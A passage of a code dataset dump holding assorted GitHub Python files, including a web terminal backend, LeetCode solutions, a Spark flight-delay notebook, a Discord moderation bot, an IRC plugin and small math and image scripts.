await server.emit(\"reqResz\", to=sid)\n\n@server.on(\"dat2be\")\nasync def dataToBackend(sid, data):\n connections[sid].write(bytes(data, \"utf-8\"))\n\n@server.on(\"resz\")\nasync def reszCB(sid, data):\n obj = json.loads(data)\n cols = int(obj[\"cols\"])\n rows = int(obj[\"rows\"])\n connections[sid].resize(cols, rows)\n\n@server.event\ndef disconnect(sid):\n print(f\"disconnect: {sid}\")\n connections[sid].close()\n connections.pop(sid)\n\n# load settings\nwith open(\"backend-config.json\") as config_file:\n contents = config_file.read()\n config = json.loads(contents)\n PORT = int(config[\"port\"])\n SHELL = config[\"shell\"]\n\nprint(f\"starting server: PORT={PORT}, SHELL={SHELL}\")\n\nloop = asyncio.new_event_loop()\nconfig = uvicorn.Config(app=app, host=\"127.0.0.1\", port=PORT, loop=loop)\ns = uvicorn.Server(config)\nfut = loop.create_task(s.serve())\nloop.create_task(ttyFN())\nloop.run_until_complete(fut)\n\n","repo_name":"theVerySharpFlat/webterm","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3860,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"641800413","text":"'''\n127. Word Ladder\nhttps://leetcode.com/problems/word-ladder/\n'''\n\n\nfrom collections import defaultdict, deque\n\n\n# BFS\nclass Solution:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n wordSet = set(wordList)\n queue = deque([(beginWord, 0)])\n seen = set([beginWord])\n maskMap = defaultdict(list)\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n while queue:\n word, steps = queue.popleft()\n if word == endWord:\n return steps + 1\n for i in range(len(beginWord)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate not in seen:\n seen.add(candidate)\n queue.append((candidate, steps+1))\n return 0\n\n\n# Bidirectional BFS\nclass Solution2:\n def ladderLength(self, beginWord: str, endWord: str, wordList: List[str]) -> int:\n queue_begin = deque([(beginWord)])\n queue_end = deque([(endWord)])\n seen_begin = {beginWord: 1}\n seen_end = {endWord: 1}\n maskMap = defaultdict(list)\n \n if endWord not in wordList:\n return 0\n \n for word in wordList:\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n maskMap[masked].append(word)\n \n def bfs(queue, seen_self, seen_other):\n queue_len = len(queue)\n for _ in range(queue_len):\n word = queue.popleft()\n for i in range(len(word)):\n masked = word[:i] + '*' + word[i+1:]\n for candidate in maskMap[masked]:\n if candidate in seen_other:\n return seen_other[candidate] + seen_self[word]\n if candidate not in seen_self:\n seen_self[candidate] = seen_self[word] + 1\n queue.append((candidate))\n \n while queue_begin and queue_end:\n if len(queue_begin) <= len(queue_end):\n ans = bfs(queue_begin, seen_begin, seen_end)\n else:\n ans = bfs(queue_end, seen_end, seen_begin)\n if ans:\n return ans\n\n return 0\n","repo_name":"supawichable/leetcode","sub_path":"0127_word_ladder.py","file_name":"0127_word_ladder.py","file_ext":"py","file_size_in_byte":2476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14993265039","text":"\n\nfrom math import *\nfrom numpy import *\nimport numpy\nimport pylab as p\nimport random\nimport itertools as itt\n\ndef L(x, k, X ):\n s=1.0\n for j in range(len(X)):\n if j != k:\n s *= float(x-X[j])/(X[k]-X[j])\n return s\n\n\nq=20\n\n[theta1, theta2] = mgrid[0.0: pi+pi/(q-1): pi/(q-1), 0.0: pi+pi/(q-1): pi/(q-1) ]\nz1 = numpy.vectorize(lambda t1,t2: 0.5*cos(t1))\nz2 = numpy.vectorize(lambda t1,t2: 0.5*cos(t2))\nZ1 = z1(theta1, theta2)\nZ2 = z2(theta1, theta2)\n\ntheta = arange( 0.0, pi+pi/(q-1), pi/(q-1) )\nZ = [ 0.5*cos(t) for t in theta]\n\nf = lambda x,y: cos(x*4.0*pi)*sin(y*4.0*pi)\n\nf_ = numpy.vectorize(f)\nF = f_(Z1,Z2)\n\nL2 = lambda z1,z2,i1,i2: L(z1, i1, Z )*L(z2, i2, Z ) \ng = lambda z1,z2: sum([ L2(z1,z2,i1,i2)*F[i1][i2] for (i1,i2) in itt.product(range(q),range(q)) ])\n\n\nX = [ (random.uniform(-0.5,0.5),random.uniform(-0.5,0.5)) for k in range(100) ]\n\nY1 = [ f(z1,z2) for (z1,z2) in X ]\nY2 = [ g(z1,z2) for (z1,z2) in X ]\n\n\nerr = []\nfor k in range(len(Y1)):\n try:\n err.append( log10(abs(Y1[k] -Y2[k])/abs(Y1[k])+1E-17) )\n except:\n pass\n\nimport pylab as p\np.hist(err, bins=30)\np.show()\n\n\n\n\n\n\n\n","repo_name":"nmaxwell/research","sub_path":"FIO/butterfly/approx/interp2D.py","file_name":"interp2D.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"26097703503","text":"from __future__ import division\n\nfrom typing import Union\nimport numbers\nimport numpy\nfrom numpy import ndarray\nfrom pyproj import Proj\nfrom resippy.image_objects.earth_overhead.earth_overhead_point_calculators.abstract_earth_overhead_point_calc \\\n import AbstractEarthOverheadPointCalc\nfrom scipy.spatial.ckdtree import cKDTree\n\n\nclass IGMPointCalc(AbstractEarthOverheadPointCalc):\n def __init__(self,\n lon_array, # type: ndarray\n lat_array, # type: ndarray\n alt_array, # type: Union[ndarray, float]\n projection, # type: Proj\n ):\n self._lons = lon_array\n self._lats = lat_array\n self._npix_y, self._npix_x = lon_array.shape\n self.set_projection(projection)\n if isinstance(alt_array, numbers.Number):\n self._alts = numpy.zeros_like(lon_array)\n else:\n self._alts = alt_array\n self._bands_coregistered = True\n\n self._lons_1d = None # type: ndarray\n self._lats_1d = None # type: ndarray\n self._kd_tree = None # type: KDTree\n self.set_approximate_lon_lat_center(lon_array[int(self._npix_y/2), int(self._npix_x/2)],\n lat_array[int(self._npix_y/2), int(self._npix_x/2)])\n\n @property\n def lon_image(self):\n return self._lons\n\n @property\n def lat_image(self):\n return self._lats\n\n @property\n def alt_image(self):\n return self._alts\n\n def _pixel_x_y_alt_to_lon_lat_native(self, pixel_xs, pixel_ys, alts=None, band=None):\n return self._lons[pixel_ys, pixel_xs], self._lats[pixel_ys, pixel_xs]\n\n def _lon_lat_alt_to_pixel_x_y_native(self, lons, lats, alts, band=None):\n if self._lons_1d is None:\n self._lons_1d = numpy.ravel(self._lons)\n if self._lats_1d is None:\n self._lats_1d = numpy.ravel(self._lats)\n if self._kd_tree is None:\n kd_tree_data = numpy.transpose((self._lons_1d, self._lats_1d))\n self._kd_tree = cKDTree(kd_tree_data)\n\n distances, indices_1d = self._kd_tree.query(numpy.asarray((lons, lats)).transpose(), 6)\n indices_2d = numpy.unravel_index(indices_1d, (self._npix_y, self._npix_x))\n\n # Perform the interpolation here using an inverse distance weighted method\n distances[numpy.isclose(distances, 0)] = 0.00000001\n inv_distances = 1 / distances\n inv_distances_sum = numpy.sum(1 / distances, axis=1)\n interpolated_y_vals = numpy.sum(inv_distances * indices_2d[0], axis=1) / inv_distances_sum\n interpolated_x_vals = numpy.sum(inv_distances * indices_2d[1], axis=1) / inv_distances_sum\n return interpolated_x_vals, interpolated_y_vals\n\n","repo_name":"BeamIO-Inc/resippy","sub_path":"resippy/image_objects/earth_overhead/earth_overhead_point_calculators/igm_point_calc.py","file_name":"igm_point_calc.py","file_ext":"py","file_size_in_byte":2755,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"32168944737","text":"\n\n# coding: utf-8\n\n\n# Create a image\n\n\nfrom PIL import Image, ImageDraw, ImageFont, ImageFilter\nimport random\n\ndef get_rnd_color():\n\treturn (random.randint(0, 255), random.randint(0, 255), random.randint(0, 255))\n\ndef get_rnd_code(n):\n\tcode = ''\n\tfor i in range(n):\n\t\tcode = code + str(chr(random.randint(65, 90)))\n\treturn code\n\nwidth, height = 150, 50\n\nimage = Image.new('RGB', (width, height))\n\ndraw = ImageDraw.Draw(image)\n\nfor i in range(width):\n\tfor j in range(height):\n\t\tdraw.point((i, j), get_rnd_color())\n\nfont = ImageFont.truetype('arial.ttf', 25)\n\ndraw.text((10, 10), get_rnd_code(7), fill=(255, 255, 255, 1), font=font)\n# image = image.filter(ImageFilter.BLUR)\n\n\nimage.save('./code.png')\n\n\n","repo_name":"renhongl/python_demo","sub_path":"python_demo_v1/study/study_image_lib.py","file_name":"study_image_lib.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"16387521735","text":"# Databricks notebook source\n# import libraries\nimport pyspark.sql.functions as F\nfrom pyspark.sql.types import *\nfrom datetime import datetime\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n\nfrom pyspark.sql import functions as f\nfrom pyspark.sql import SQLContext\nfrom pyspark.sql.functions import monotonically_increasing_id\nfrom pyspark.sql.functions import isnan, when, count, col, isnull, percent_rank, avg, mean\nfrom pyspark.sql.functions import min\nfrom pyspark.sql.functions import col, max\nfrom pyspark.sql.functions import format_string\nfrom pyspark.sql.functions import substring\nfrom pyspark.sql.functions import concat_ws\nfrom pyspark.sql.functions import concat\nfrom pyspark.sql.functions import to_timestamp\nfrom pyspark.sql.functions import lit\nfrom pyspark.sql.functions import to_utc_timestamp\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.functions import regexp_replace\nfrom pyspark.sql.functions import instr\nfrom pyspark.sql.functions import row_number\nfrom pyspark.sql.window import Window\nfrom pyspark.sql.types import IntegerType\n\nfrom pyspark.ml.linalg import DenseVector, SparseVector, Vectors\nfrom pyspark.ml.feature import VectorAssembler, StandardScaler, StringIndexer,OneHotEncoder\nfrom pyspark.ml.classification import MultilayerPerceptronClassifier\n\n\nfrom pyspark.ml import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.ml.classification import GBTClassifier\n\nfrom pyspark.ml.classification import RandomForestClassifier, DecisionTreeClassifier, LogisticRegression\nfrom pyspark.ml.evaluation import MulticlassClassificationEvaluator, BinaryClassificationEvaluator\n\n# COMMAND ----------\n\n#Initializes blob storage credentials/location\nblob_container = \"w261-sec4-group2\" # The name of your container created in https://portal.azure.com\nstorage_account = \"kdevery\" # The name of your Storage account created in https://portal.azure.com\nsecret_scope = \"sec4-group2\" # The name of the scope created in your local computer using the Databricks CLI\nsecret_key = \"w261-key\" # The name of the secret key created in your local computer using the Databricks CLI \nblob_url = f\"wasbs://{blob_container}@{storage_account}.blob.core.windows.net\"\nmount_path = \"/mnt/mids-w261\"\n\n#Points to SAS token\nspark.conf.set(\n f\"fs.azure.sas.{blob_container}.{storage_account}.blob.core.windows.net\",\n dbutils.secrets.get(scope = secret_scope, key = secret_key)\n)\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Validation Folds\n\n# COMMAND ----------\n\n#feature processing of dfs\n\ntrain_df=train_df.select(\"*\", f.row_number().over(Window.partitionBy().orderBy(\"Date_Time_sched_dep_utc\")).alias(\"Index\"))\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\n#string indexing of carrier\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\ntrain_df = carrier_indexer.fit(train_df).transform(train_df)\n\n\n#one hot encoding\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\ntrain_df = onehotencoder_carrier_vector.fit(train_df).transform(train_df)\n\n# COMMAND ----------\n\n#splitting training dataframe into five folds contained in dictionary \"d\"\n\nd = {}\nfolds = ['df1','df2','df3','df4','df5']\n\neach_len = train_df.count()/5\nstart = 1\nval_size = each_len/5\nstop = each_len\nprecision_list = []\n\nfor fold in folds:\n d[fold] = train_df.filter(col('Index').between(start,stop))\\\n .withColumn('cv', F.when(col('Index').between(start,(stop-val_size)), 'train')\n .otherwise('val'))\n start += each_len\n stop += each_len\n\n \n\n# COMMAND ----------\n\ntrain_df.createOrReplaceTempView('train_view')\n\n# COMMAND ----------\n\n# MAGIC %sql \n# MAGIC \n# MAGIC SELECT holiday_period,mean_carrier_delay,Pagerank_Score,\n# MAGIC PREV_FLIGHT_DELAYED,origin_percent_delayed,\n# MAGIC dest_percent_delayed,\n# MAGIC ORIGIN_Prophet_trend,\n# MAGIC ORIGIN_Prophet_pred,\n# MAGIC DEST_Prophet_trend,\n# MAGIC DEST_Prophet_pred\n# MAGIC FROM train_view\n# MAGIC LIMIT 10\n\n# COMMAND ----------\n\n# MAGIC %sql\n# MAGIC \n# MAGIC SELECT COUNT(*)\n# MAGIC FROM train_view\n# MAGIC WHERE ORIGIN_Prophet_trend IS NULL\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\ntrain_df.columns\n\n# COMMAND ----------\n\ndef process_fold_df(fold_df):\n \n \n #imputation\n fold_df.createOrReplaceTempView(\"fold_view\")\n \n imputation_columns = ['CRS_ELAPSED_TIME','HourlyAltimeterSetting','HourlyDewPointTemperature',\n 'HourlyDryBulbTemperature','HourlyRelativeHumidity','HourlySeaLevelPressure',\n 'HourlyStationPressure','HourlyVisibility','HourlyWetBulbTemperature',\n 'HourlyWindDirection','mean_carrier_delay','ORIGIN_Prophet_trend',\n 'ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred',]\n\n means = {}\n\n for impute_col in imputation_columns:\n mean = spark.sql(f\"SELECT AVG({impute_col}) FROM fold_view\").collect()[0][0]\n means[impute_col] = mean\n \n print(means)\n \n #fill Nones and Nans - Seems to error sometimes?\n fold_df = fold_df.fillna(0,[\"HourlyWindGustSpeed\"]) \\\n .fillna(means[\"CRS_ELAPSED_TIME\"],[\"CRS_ELAPSED_TIME\"]) \\\n .fillna(means[\"HourlyAltimeterSetting\"],[\"HourlyAltimeterSetting\"]) \\\n .fillna(means[\"HourlyDewPointTemperature\"],[\"HourlyDewPointTemperature\"]) \\\n .fillna(means[\"HourlyDryBulbTemperature\"],[\"HourlyDryBulbTemperature\"]) \\\n .fillna(0,[\"HourlyPrecipitation\"]) \\\n .fillna(means[\"HourlyRelativeHumidity\"],[\"HourlyRelativeHumidity\"]) \\\n .fillna(means[\"HourlySeaLevelPressure\"],[\"HourlySeaLevelPressure\"]) \\\n .fillna(means[\"HourlyStationPressure\"],[\"HourlyStationPressure\"]) \\\n .fillna(means[\"HourlyVisibility\"],[\"HourlyVisibility\"]) \\\n .fillna(means[\"HourlyWetBulbTemperature\"],[\"HourlyWetBulbTemperature\"]) \\\n .fillna(means[\"HourlyWindDirection\"],[\"HourlyWindDirection\"]) \\\n .fillna(0,[\"HourlyWindSpeed\"]) \\\n .fillna(\"\",[\"TAIL_NUM\"])\\\n .fillna(0,['holiday_period'])\\\n .fillna(means['mean_carrier_delay'],['mean_carrier_delay'])\\\n .fillna(0,['PREV_FLIGHT_DELAYED'])\\\n .fillna(0,['origin_percent_delayed'])\\\n .fillna(0,['dest_percent_delayed'])\\\n .fillna(means['ORIGIN_Prophet_trend'],['ORIGIN_Prophet_trend'])\\\n .fillna(means['ORIGIN_Prophet_pred'],['ORIGIN_Prophet_pred'])\\\n .fillna(means['DEST_Prophet_trend'],['DEST_Prophet_trend'])\\\n .fillna(means['DEST_Prophet_pred'],['DEST_Prophet_pred'])\n \n\n \n #vector assembler\n feature_cols = ['MONTH','DAY_OF_MONTH','DAY_OF_WEEK','DISTANCE','HourlyWindSpeed','Rain','Blowing','Snow','Thunder','CloudySkyCondition','carrier_vec', 'holiday_period','mean_carrier_delay','Pagerank_Score','PREV_FLIGHT_DELAYED','origin_percent_delayed','dest_percent_delayed','ORIGIN_Prophet_trend','ORIGIN_Prophet_pred','DEST_Prophet_trend','DEST_Prophet_pred']\n #assemble = VectorAssembler(inputCols=feature_cols, outputCol='features')\n #outputCol = \"features\"\n df_va = VectorAssembler(inputCols = feature_cols, outputCol = 'feature_vector')\n model_input = df_va.transform(fold_df)\n \n #rename delay flag to label\n model_input = model_input.withColumnRenamed(\"DEP_DEL15\",\"label\")\n #model_input = assemble.transform(fold_df) \\\n # .withColumnRenamed('DEP_DEL15', 'label')\n \n #scaling\n scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n model_input = scaler.fit(model_input).transform(model_input)\n \n #check if cv exists, should only exist for cross fold validation not on full train, test\n if 'cv' in model_input.columns:\n model_input = model_input.select('label', 'scaled_feature_vector','cv')\n else:\n model_input = model_input.select('label', 'scaled_feature_vector')\n \n return model_input\n\n# COMMAND ----------\n\nd_processed = {}\nfor key in d.keys():\n print(key)\n d_processed[key] = process_fold_df(d[key])\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# d_processed['df1'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_1\")\n# d_processed['df2'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_2\")\n# d_processed['df3'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_3\")\n# d_processed['df4'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_4\")\n# d_processed['df5'].write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_fold_5\")\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC #Process Full Train and Test Sets\n\n# COMMAND ----------\n\n# Read in training and test data\n\ntrain_df = spark.read.parquet(f\"{blob_url}/train_data_with_adv_features\").cache()\ntest_df = spark.read.parquet(f\"{blob_url}/test_data_with_adv_features\")\n\n# COMMAND ----------\n\n#string indexing of carrier for train\ncarrier_indexer = StringIndexer(inputCol=\"OP_CARRIER\", outputCol=\"OP_CARRIER_Index\")\nindexer_transformer = carrier_indexer.setHandleInvalid(\"keep\").fit(train_df)\ntrain_df = indexer_transformer.transform(train_df)\n\n#one hot encoding for train\nonehotencoder_carrier_vector = OneHotEncoder(inputCol=\"OP_CARRIER_Index\", outputCol=\"carrier_vec\")\nonehotencoder_transformer = onehotencoder_carrier_vector.fit(train_df)\ntrain_df = onehotencoder_transformer.transform(train_df)\n\n# COMMAND ----------\n\ndisplay(train_df)\n\n# COMMAND ----------\n\n#string indexing of carrier for test\n#one hot encoding for test\ntest_df = indexer_transformer.transform(test_df)\ntest_df = onehotencoder_transformer.transform(test_df)\n\n# COMMAND ----------\n\nlen(indexer_transformer.labels)\n\n# COMMAND ----------\n\n#cast holiday to integer\ntrain_df = train_df.withColumn(\"holiday_period\", train_df[\"holiday_period\"].cast(IntegerType()))\ntest_df = test_df.withColumn(\"holiday_period\", test_df[\"holiday_period\"].cast(IntegerType()))\n\n# COMMAND ----------\n\nprocessed_train_df = process_fold_df(train_df)\n\n#scale to train on train set\n# scaler=StandardScaler().setInputCol(\"feature_vector\").setOutputCol(\"scaled_feature_vector\")\n# scaler_transformer = scaler.fit(processed_train_df)\n# processed_train_df = scaler_transformer.transform(processed_train_df)\n\nprocessed_test_df = process_fold_df(test_df)\n# #scale to train on test set\n# processed_test_df = scaler_transformer.transform(processed_test_df)\n\n\n# COMMAND ----------\n\nprocessed_test_df1 = processed_test_df.withColumn(\"index\", monotonically_increasing_id()) \n\n# COMMAND ----------\n\ndisplay(processed_train_df)\n\n# COMMAND ----------\n\ndisplay(processed_test_df1)\n\n# COMMAND ----------\n\nprocessed_test_df.count()\n\n# COMMAND ----------\n\n# commented out to ensure no overwrite if run all is pressed\n\n# processed_train_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_train\")\n# processed_test_df.write.mode(\"overwrite\").parquet(f\"{blob_url}/processed_test\")\n\n# COMMAND ----------\n\ndisplay(dbutils.fs.ls(f\"{blob_url}\"))\n\n# COMMAND ----------\n\n","repo_name":"cmunugala/flight-delay","sub_path":"Model_building/Process_data.py","file_name":"Process_data.py","file_ext":"py","file_size_in_byte":11443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71774486568","text":"import csv\n\nwith open('stage3_test.csv', newline='') as csv_in, open(\"10000 int:\r\n \"\"\"\r\n Calcula e retorna o valor do delta.\r\n \"\"\"\r\n\r\n return (b**2) - (4*a*c)\r\n\r\n\r\ndef calculate_bhaskara(a: int, b: int, c: int) -> Tuple[float, float]:\r\n \"\"\"\r\n Calcula e retorna o resultado da formula de bhaskara. \r\n \"\"\"\r\n\r\n assert isinstance(a, int), \"o valor do coeficiente a nao eh inteiro\"\r\n assert a != 0, \"o valor do coeficiente a nao pode ser igual a 0\"\r\n assert isinstance(b, int), \"o valor do coeficiente b nao eh inteiro\"\r\n assert isinstance(c, int), \"o valor do coeficiente c nao eh inteiro\"\r\n\r\n\r\n delta = calculate_delta(a=a, b=b, c=c)\r\n\r\n if delta < 0:\r\n print(f\"A equacao nao possui raizes pertencentes ao conjunto dos numeros reais, pois delta = {round(delta, 2)} < 0\")\r\n return\r\n \r\n x1 = ((-b) + (sqrt(delta))) / (2*a)\r\n x2 = ((-b) - (sqrt(delta))) / (2*a)\r\n\r\n print(f\"As raizes da equacao {a}(x^2) {'+' if b > 0 else ''}{b}(x) {'+' if c > 0 else ''}{c} sao x1 = {round(x1, 2)} e x2 = {round(x2, 2)}\")\r\n\r\n return x1, x2\r\n\r\n\r\nif __name__ == \"__main__\":\r\n \"\"\"\r\n Modifique os valores de a, b e c a sua escolha.\r\n \"\"\"\r\n\r\n a = -1\r\n b = 6\r\n c = -9\r\n\r\n calculate_bhaskara(a=a, b=b, c=c)","repo_name":"eliasciceros/criando_apis_em_python","sub_path":"atividade_1/formula_de_Bhaskara.py","file_name":"formula_de_Bhaskara.py","file_ext":"py","file_size_in_byte":1824,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23932554674","text":"#=========================================================\n#\t\t\t\t\tBiblio\n#=========================================================\n\nimport discord # Импортируем библиотеку дискорд\nfrom discord.ext import commands \nfrom discord.utils import get\nfrom config import config # импортируем переменную конфиг\nimport json\nimport random\n\n#=========================================================\n#\t\t\t\t\tEvents\n#=========================================================\n\nclient = commands.Bot(command_prefix = config['prefix'])\nclient.remove_command('help')\n\n@client.event\nasync def on_ready():\n\tprint('[LOG] Bot a online!') # Пишем в консоль о том что бот работает\n\n\tawait client.change_presence( status = discord.Status.online, activity = discord.Game('Discord')) # статус\n\n\n#=========================================================\n#\t\t\t\t\tCode\n#=========================================================\n#=========================================================\n#\t\t\t\t\tКоманда \"Kick\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def kick(ctx, member: discord.Member = None, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.kick( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Kick\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот кикнул пользователя {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Ban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def ban( ctx, member: discord.Member, *, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tawait member.ban( reason = reason)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Ban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот забанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\n#=========================================================\n#\t\t\t\t\tКоманда \"Mute\"\n#p.s. создайте роль \"Mute\" для начала\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def mute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.add_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Mute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот дал мут игроку {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Unmute\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unmute( ctx, member: discord.Member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tmute_role = discord.utils.get(ctx.message.guild.roles, name = 'Mute')\n\n\tawait member.remove_roles(mute_role)\n\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unmute\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот убрал мут с игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n#=========================================================\n#\t\t\t\t\tКоманда \"Unban\"\n#=========================================================\n@client.command(pass_context = True)\n@commands.has_permissions( administrator = True)\nasync def unban(ctx, *, member, reason):\n\tawait ctx.channel.purge( limit = 1)\n\tbanned_users = await ctx.guild.bans()\n\n\tfor banned_entry in banned_users:\n\t\tuser = banned_entry.user\n\n\t\tawait ctx.guild.unban(user)\n\t\tawait ctx.send(embed = discord.Embed(\n\t\ttitle = f\"\"\"Unban\"\"\",\n\t\tdescription = f\"\"\"\n\t\tБот разбанил игрока {member.mention}. Причина: {reason}\n\t\tПопросил: {ctx.author.mention}\"\"\",\n\t\tcolor = 15158332,\n\t\tinline = False\n\t\t))\t\n\n\t\treturn\n\n#=========================================================\n#\t\t\t\t\tКоманда \"Clear\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True)\nasync def clear(ctx, amount=5):\n\tawait ctx.channel.purge(limit=amount)\n\n#=========================================================\n#\t\t\t\t\tКоманда \"changestatus\"\n#=========================================================\n@client.command()\n@commands.has_permissions( administrator = True )\nasync def changestatus( ctx, statustype:str = None, *, arg:str = None):\n if statustype is None: # Type Check\n await ctx.send( 'Вы не указали тип Статуса' )\n elif arg is None: # Arg Check\n await ctx.send( 'Вы не указали нужный аргумент' )\n else:\n if statustype.lower() == 'game': # Game\n await Bot.change_presence (activity=discord.Game( name = arg) )\n elif statustype.lower() == 'listen': # Listen\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.listening, name = arg) )\n elif statustype.lower() == 'watch': # Watch\n await Bot.change_presence( activity=discord.Activity( type=discord.ActivityType.watching, name = arg) )\n#=========================================================\n#\t\t\t\t\tRun a bot\n#=========================================================\nclient.run(config['token'])\n","repo_name":"JoJoDevelopers/code.py","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":5819,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73699160167","text":"import time\nimport sys\nimport os\nimport pyircbot\nfrom datetime import timedelta\n\nif len(sys.argv) < 2:\n print(\"Port!\")\n sys.exit(2)\n\nPORT=int(sys.argv[1])\n\ndef load_token(fname):\n path = os.path.expanduser(fname)\n with open(path, 'r') as f:\n token = f.readlines()[0].strip()\n\n return token\n\ndef onMessage(bot, message):\n if message.command != \"PRIVMSG\":\n return\n\n CMD = \"!osuptime\"\n if not message.params[1][:len(CMD)] == CMD:\n return\n\n with open('/proc/uptime', 'r') as f:\n uptime_seconds = float(f.readline().split()[0])\n uptime_string = str(timedelta(seconds = uptime_seconds)) \n\n uptime_msg = \"{color} Host system uptime: {uptime}! {reset}\".format(\n color=chr(0x03) + '07,01',\n reset=chr(0x0F),\n uptime=uptime_string \n )\n\n resp = pyircbot.IRCMessage()\n resp.command = \"PRIVMSG\"\n resp.params = [pyircbot.response_destination(message), uptime_msg]\n bot.sendIrcMessage(resp)\n\nplugin = pyircbot.Plugin()\nplugin.name='leettime'\nplugin.token=load_token('~/ircbot_token')\nplugin.onMessage = onMessage\n\nbot = pyircbot.Bot('127.0.0.1', PORT, plugin)\nbot.start()\n\nsent = False\nwhile bot.isRunning():\n time.sleep(0.1)\n\nbot.wait()\n","repo_name":"kolodziej/ircbot","sub_path":"py-plugins/osuptime.py","file_name":"osuptime.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22215503466","text":"# 从摄像头出采集手势照片,用作训练集与测试集\n# 基于opencv\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport time\nimport sys, os, re\nimport cv2\n\n# 清空特定文件夹内的文件\ndef clear_dir(path='.\\dataset\\HAND POSE'):\n print(\"start trying to clean the path\")\n time.sleep(1)\n files = os.listdir(path) # 得到文件夹下所有文件的名称\n if len(files) == 0:\n print(\"dir already cleaned\")\n time.sleep(2)\n else:\n for fi in files:\n os.remove(path + '\\\\' + fi)\n files = os.listdir(path)\n if len(files) == 0:\n print(\"successfully clean the dir\")\n time.sleep(2) \n\n# 控制摄像头捕获视频\n# 图片默认存放路径: .\\dataset\\HAND POSE\ndef control_camera(pic_number=10, path='.\\dataset\\HAND POSE'):\n n = 0 # 